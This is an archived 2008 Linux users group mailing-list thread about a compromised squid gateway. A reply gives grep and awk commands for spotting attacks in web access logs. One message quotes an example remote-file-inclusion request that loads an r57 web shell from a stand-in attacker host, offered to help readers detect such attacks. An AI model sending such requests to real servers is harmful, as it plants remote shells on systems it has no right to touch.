Michael Lazin on 4 Nov 2008 17:44:32 -0800


[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]

Re: [PLUG] weird process?

by the way, if you find any files that you don't recognize you can grep for their time stamp

On Tue, Nov 4, 2008 at 8:39 PM, Michael Lazin <microlaser@gmail.com> wrote:
Morpheus fucking scanner is pretty common in access logs, I see it a lot.  If it is a 200 it means a successful connection, but of course if you have a custom 404 page it may just be a successful connection to a 404 page.  The most common exploits look like GET or POST script.php?var=http://evil.code.html/r57.txt or the like.  You can grep for ="" If it is a 200 and you have no custom 404 this was most likely a success RFI attack.  A get to a different file is usually not an attack unless it contains that =http string showing file inclusion.  Code injection attacks will most likely show up as a POST from a suspicious IP.  Try using grep with awk to examine all the IPs that have POST data associated with them in the logs, something like:
zgrep POST access.log* | grep " 200 " | awk '{print $1}'|sort -u

When searching for remote file inclusion try something like:

for i in  32 33 34.* current; do zgrep =http access.log.$i*|grep " 200 " |grep -v google | grep -v yahoo | less; done 

to look for the =http string in the access logs from the past couple weeks. 

On Tue, Nov 4, 2008 at 8:24 PM, Eric <eric@lucii.org> wrote:
Ah, I believe I see:  You're saying the box is compromised in some other
way and squid is the tool they used _after_ they broke in to serve up
their mischief.
That makes sense.

Thanks,

Eric



James Barrett wrote:
> If squid were configured correctly, and there are no publicly known
> squid vulnerabilities for the version being run (and the version being
> run was compiled without any custom patches), it is probably safe to
> say that the point of unauthorized entry was not squid.  Think about
> it this way, if someone discovered an unpublicized exploit and if they
> were out to do mischief, would they start by picking some gateway
> hooked up to a T1?  No, they would probably pick something else with
> which they could wreak a gigantic amount of havoc.
>
> My uneducated guess is that whoever got in did so by some other means.
>   They then took the opportunity to use squid to their advantage after
> the fact.  Unless of course the squid being run was in fact
> vulnerable...
>
> --
> Jim
>
> On Tue, Nov 4, 2008 at 6:16 PM, Eric<eric@lucii.org>  wrote:
>
>> Well, I'm not sure.  Stopping squid stops the incessant network traffic
>> that saturates the T1 line but nobody is sure yet WHY.
>> The network wizards are working on it so I stay in the background
>> working on other things :-)
>> I'll post details as available - when I know them.
>>
>>
>> Eric
>>
>> George A. Theall wrote:
>>
>>> On Tue, Nov 04, 2008 at 12:55:44PM -0500, Eric wrote:
>>>
>>>
>>>
>>>> Turns out the system has been compromised (via a squid exploit we're
>>>> thinking)
>>>>
>>>>
>>> Just curious...  Is this a 0-day or a known issue? Scanning through
>>> various vulnerability databases, I only see denial of service issues
>>> affecting Squid itself, at least going back through 2007.
>>>
>>> George
>>>
>>>
>> --
>> #  Eric Lucas
>> #
>> #                "Oh, I have slipped the surly bond of earth
>> #                 And danced the skies on laughter-silvered wings...
>> #                                        -- John Gillespie Magee Jr
>>
>> ___________________________________________________________________________
>> Philadelphia Linux Users Group         --        http://www.phillylinux.org
>> Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
>> General Discussion  --   http://lists.phillylinux.org/mailman/listinfo/plug
>>
>>
> ___________________________________________________________________________
> Philadelphia Linux Users Group         --        http://www.phillylinux.org
> Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
> General Discussion  --   http://lists.phillylinux.org/mailman/listinfo/plug
>

--
#  Eric Lucas
#
#                "Oh, I have slipped the surly bond of earth
#                 And danced the skies on laughter-silvered wings...
#                                        -- John Gillespie Magee Jr

___________________________________________________________________________
Philadelphia Linux Users Group         --        http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion  --   http://lists.phillylinux.org/mailman/listinfo/plug



--
Michael Lazin
To gar auto estin noein te kai enai



--
Michael Lazin
To gar auto estin noein te kai enai
___________________________________________________________________________
Philadelphia Linux Users Group         --        http://www.phillylinux.org
Announcements - http://lists.phillylinux.org/mailman/listinfo/plug-announce
General Discussion  --   http://lists.phillylinux.org/mailman/listinfo/plug